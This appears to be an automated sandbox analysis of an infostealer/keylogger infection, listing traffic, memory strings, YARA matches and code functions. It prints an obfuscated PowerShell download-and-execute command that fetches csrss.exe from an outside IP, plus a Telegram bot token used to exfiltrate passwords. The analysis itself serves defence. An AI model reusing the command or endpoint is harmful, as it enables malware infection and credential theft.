                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.227.228.22
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_046B7A18 URLDownloadToFileW,3_2_046B7A18
                  Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /54/csrss.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 192.227.228.22Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                  Source: unknownHTTP traffic detected: POST /bot7653831104:AAGSRFQyeJurjKPP8kGFOQU_KT_ipaVGGFM/sendDocument?chat_id=6306897853&caption=user%20/%20Passwords%20/ HTTP/1.1Content-Type: multipart/form-data; boundary================8dd61a39278e6c1Host: api.telegram.orgContent-Length: 1076Connection: Keep-Alive
                  Source: powershell.exe, 00000003.00000002.1384687174.000000000507B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.227.228.22/54/csrss.e
                  Source: powershell.exe, 00000003.00000002.1384687174.000000000507B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.227.228.22/54/csrss.exe
                  Source: powershell.exe, 00000003.00000002.1410097716.000000000836C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.227.228.22/54/csrss.exem
                  Source: dajivhqI.pif, 00000010.00000002.2495714250.0000000028AD3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                  Source: dajivhqI.pif, 00000010.00000002.2495714250.00000000289FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                  Source: dajivhqI.pif, 00000010.00000002.2495714250.00000000289F0000.00000004.00000800.00020000.00000000.sdmp, dajivhqI.pif, 00000010.00000002.2495714250.00000000289FC000.00000004.00000800.00020000.00000000.sdmp, dajivhqI.pif, 00000010.00000002.2495714250.0000000028AD3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                  Source: dajivhqI.pif, 00000010.00000002.2495714250.000000002897B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                  Source: dajivhqI.pif, 00000010.00000002.2494926367.0000000028510000.00000004.00000020.00020000.00000000.sdmp, dajivhqI.pif, 00000010.00000002.2497539381.0000000029911000.00000004.00000800.00020000.00000000.sdmp, dajivhqI.pif, 00000010.00000002.2495630239.00000000287C0000.00000004.08000000.00040000.00000000.sdmp, dajivhqI.pif, 00000010.00000002.2497929209.000000002B4E0000.00000004.08000000.00040000.00000000.sdmp, dajivhqI.pif, 00000010.00000003.1383089164.0000000026ABD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                  Source: powershell.exe, 00000003.00000002.1410097716.000000000835B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                  Source: powershell.exe, 00000003.00000002.1394160409.0000000005BFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: powershell.exe, 00000003.00000002.1384687174.0000000004CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: dajivhqI.pif, 00000010.00000002.2495714250.0000000028A1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                  Source: powershell.exe, 00000003.00000002.1384687174.0000000004CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                  Source: powershell.exe, 00000003.00000002.1384687174.0000000004B91000.00000004.00000800.00020000.00000000.sdmp, dajivhqI.pif, 00000010.00000002.2495714250.000000002897B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: powershell.exe, 00000003.00000002.1384687174.0000000004CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                  Source: powershell.exe, 00000003.00000002.1384687174.0000000004CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: powershell.exe, 00000003.00000002.1410097716.000000000836C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c
                  Source: csrss.exe, 0000000B.00000003.1355154988.0000000000887000.00000004.00000020.00020000.00000000.sdmp, csrss.exe, 0000000B.00000003.1352751659.000000007EBC0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000B.00000003.1352449792.000000007ED16000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000B.00000002.1359633832.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000B.00000003.1352751659.000000007EC06000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000B.00000002.1376307203.0000000021499000.00000004.00001000.00020000.00000000.sdmp, dajivhqI.pif, 00000010.00000000.1355560716.0000000000416000.00000002.00000001.01000000.0000000A.sdmp, dajivhqI.pif.11.drString found in binary or memory: http://www.pmail.com
                  Source: powershell.exe, 00000003.00000002.1380237471.0000000002CBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka..winsvr
                  Source: powershell.exe, 00000003.00000002.1384687174.0000000004B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                  Source: powershell.exe, 00000003.00000002.1384687174.0000000004CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                  Source: dajivhqI.pif, 00000010.00000002.2495714250.0000000028AD3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                  Source: dajivhqI.pif, 00000010.00000002.2495714250.0000000028AD3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                  Source: dajivhqI.pif, 00000010.00000002.2494926367.0000000028510000.00000004.00000020.00020000.00000000.sdmp, dajivhqI.pif, 00000010.00000002.2497539381.0000000029911000.00000004.00000800.00020000.00000000.sdmp, dajivhqI.pif, 00000010.00000002.2495630239.00000000287C0000.00000004.08000000.00040000.00000000.sdmp, dajivhqI.pif, 00000010.00000002.2497929209.000000002B4E0000.00000004.08000000.00040000.00000000.sdmp, dajivhqI.pif, 00000010.00000003.1383089164.0000000026ABD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
                  Source: dajivhqI.pif, 00000010.00000002.2495714250.0000000028AD3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7653831104:AAGSRFQyeJurjKPP8kGFOQU_KT_ipaVGGFM/sendDocument?chat_id=6306
                  Source: powershell.exe, 00000003.00000002.1394160409.0000000005BFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000003.00000002.1394160409.0000000005BFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000003.00000002.1394160409.0000000005BFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: powershell.exe, 00000003.00000002.1384687174.0000000004CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: powershell.exe, 00000003.00000002.1410505100.00000000083A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                  Source: powershell.exe, 00000003.00000002.1394160409.0000000005BFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: dajivhqI.pif, 00000010.00000002.2495714250.00000000289FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                  Source: dajivhqI.pif, 00000010.00000002.2494926367.0000000028510000.00000004.00000020.00020000.00000000.sdmp, dajivhqI.pif, 00000010.00000002.2497539381.0000000029911000.00000004.00000800.00020000.00000000.sdmp, dajivhqI.pif, 00000010.00000002.2495630239.00000000287C0000.00000004.08000000.00040000.00000000.sdmp, dajivhqI.pif, 00000010.00000002.2497929209.000000002B4E0000.00000004.08000000.00040000.00000000.sdmp, dajivhqI.pif, 00000010.00000003.1383089164.0000000026ABD000.00000004.00000020.00020000.00000000.sdmp, dajivhqI.pif, 00000010.00000002.2495714250.00000000289FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49719 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Source: 16.2.dajivhqI.pif.2b4e0000.10.raw.unpack, UltraSpeed.cs.Net Code: VKCodeToUnicode
                  Source: Yara matchFile source: Process Memory Space: csrss.exe PID: 1812, type: MEMORYSTR

                  System Summary

                  barindex
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWErSHeLL -eX BYPass -nOp -w 1 -c DeviceCREdEntialdEpLoyMent ; iEx($(IEX('[SYSteM.TeXT.ENCoDinG]'+[CHar]58+[chaR]58+'UTf8.GETSTRING([SYsTeM.converT]'+[Char]0X3A+[CHAr]0x3a+'FRomBaSe64sTRiNG('+[CHaR]34+'JGpJVDE3aWdEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10WXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFckRlZmlOSXRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbU9uLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSVFOak56ZXJlbixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUVQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFIZHlKeixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxaWZSaGwpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJtaE95RFdxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYTEJ3RkNQICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRqSVQxN2lnRDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4yMjcuMjI4LjIyLzU0L2NzcnNzLmV4ZSIsIiRlbnY6QVBQREFUQVxjc3Jzcy5leGUiLDAsMCk7c3RBcnQtc0xFRVAoMyk7aU52T2tFLWlURU0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGNzcnNzLmV4ZSI='+[cHaR]0X22+'))')))"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWErSHeLL -eX BYPass -nOp -w 1 -c DeviceCREdEntialdEpLoyMent ; iEx($(IEX('[SYSteM.TeXT.ENCoDinG]'+[CHar]58+[chaR]58+'UTf8.GETSTRING([SYsTeM.converT]'+[Char]0X3A+[CHAr]0x3a+'FRomBaSe64sTRiNG('+[CHaR]34+'JGpJVDE3aWdEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10WXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFckRlZmlOSXRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbU9uLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSVFOak56ZXJlbixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUVQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFIZHlKeixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxaWZSaGwpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJtaE95RFdxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYTEJ3RkNQICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRqSVQxN2lnRDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4yMjcuMjI4LjIyLzU0L2NzcnNzLmV4ZSIsIiRlbnY6QVBQREFUQVxjc3Jzcy5leGUiLDAsMCk7c3RBcnQtc0xFRVAoMyk7aU52T2tFLWlURU0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGNzcnNzLmV4ZSI='+[cHaR]0X22+'))')))"Jump to behavior
                  Source: 16.2.dajivhqI.pif.46b268.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 16.1.dajivhqI.pif.438038.2.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 16.2.dajivhqI.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 16.2.dajivhqI.pif.2993e390.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 16.2.dajivhqI.pif.2993e390.7.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 11.2.csrss.exe.218d9ba8.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 16.2.dajivhqI.pif.28551936.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 16.2.dajivhqI.pif.28551936.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 16.2.dajivhqI.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 16.2.dajivhqI.pif.438038.2.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 16.2.dajivhqI.pif.2b4e0000.10.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 16.2.dajivhqI.pif.2b4e0000.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 16.2.dajivhqI.pif.29915570.9.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 16.2.dajivhqI.pif.29915570.9.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 16.2.dajivhqI.pif.287c0000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 16.2.dajivhqI.pif.287c0000.5.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 16.1.dajivhqI.pif.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 16.1.dajivhqI.pif.438038.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 16.1.dajivhqI.pif.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 16.2.dajivhqI.pif.28551936.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 16.2.dajivhqI.pif.28551936.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 16.2.dajivhqI.pif.287c0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 16.2.dajivhqI.pif.287c0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 16.2.dajivhqI.pif.28550a4e.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 16.2.dajivhqI.pif.28550a4e.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 16.1.dajivhqI.pif.46b268.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 16.2.dajivhqI.pif.2b4e0000.10.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 16.2.dajivhqI.pif.2b4e0000.10.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 16.3.dajivhqI.pif.26abd218.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 16.3.dajivhqI.pif.26abd218.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 11.2.csrss.exe.218d9ba8.7.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 11.2.csrss.exe.2190cdd8.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 16.2.dajivhqI.pif.29916458.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 16.2.dajivhqI.pif.29916458.8.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 16.2.dajivhqI.pif.29915570.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 16.2.dajivhqI.pif.29915570.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 16.2.dajivhqI.pif.28550a4e.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 16.2.dajivhqI.pif.28550a4e.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 16.2.dajivhqI.pif.287c0ee8.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 16.2.dajivhqI.pif.287c0ee8.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 16.3.dajivhqI.pif.26abd218.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 16.3.dajivhqI.pif.26abd218.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 16.2.dajivhqI.pif.287c0ee8.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 16.2.dajivhqI.pif.287c0ee8.6.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 16.2.dajivhqI.pif.438038.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 16.2.dajivhqI.pif.2993e390.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 16.2.dajivhqI.pif.2993e390.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 16.2.dajivhqI.pif.29916458.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 16.2.dajivhqI.pif.29916458.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 00000010.00000002.2494926367.0000000028510000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000010.00000002.2475304362.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 00000010.00000002.2497539381.0000000029911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000010.00000001.1355929269.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 00000010.00000002.2495630239.00000000287C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000010.00000002.2495630239.00000000287C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 00000010.00000002.2497929209.000000002B4E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000010.00000002.2497929209.000000002B4E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 00000010.00000003.1383089164.0000000026ABD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: dajivhqI.pif PID: 7196, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\csrss.exeJump to dropped file
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\csrss[1].exeJump to dropped file
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 11_2_02EA421C GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,11_2_02EA421C
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 11_2_02EA3380 NtWriteVirtualMemory,11_2_02EA3380
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 11_2_02EA3034 NtAllocateVirtualMemory,11_2_02EA3034
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 11_2_02EA9654 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,11_2_02EA9654
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 11_2_02EA9738 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,11_2_02EA9738
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 11_2_02EA95CC RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,11_2_02EA95CC
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 11_2_02EA3B44 NtUnmapViewOfSection,11_2_02EA3B44
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 11_2_02EA38D4 NtReadVirtualMemory,11_2_02EA38D4
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 11_2_02EA421A GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,11_2_02EA421A
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 11_2_02EA3032 NtAllocateVirtualMemory,11_2_02EA3032
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 11_2_02EA9578 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,11_2_02EA9578
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 11_2_02EAA634 InetIsOffline,Sleep,CreateProcessAsUserW,ResumeThread,CloseHandle,CloseHandle,ExitProcess,11_2_02EAA634
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 11_2_02E920B411_2_02E920B4
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 11_2_02EB718711_2_02EB7187
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_00408C6016_2_00408C60
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_0040DC1116_2_0040DC11
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_00407C3F16_2_00407C3F
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_00418CCC16_2_00418CCC
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_00406CA016_2_00406CA0
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_004028B016_2_004028B0
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_0041A4BE16_2_0041A4BE
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_0041824416_2_00418244
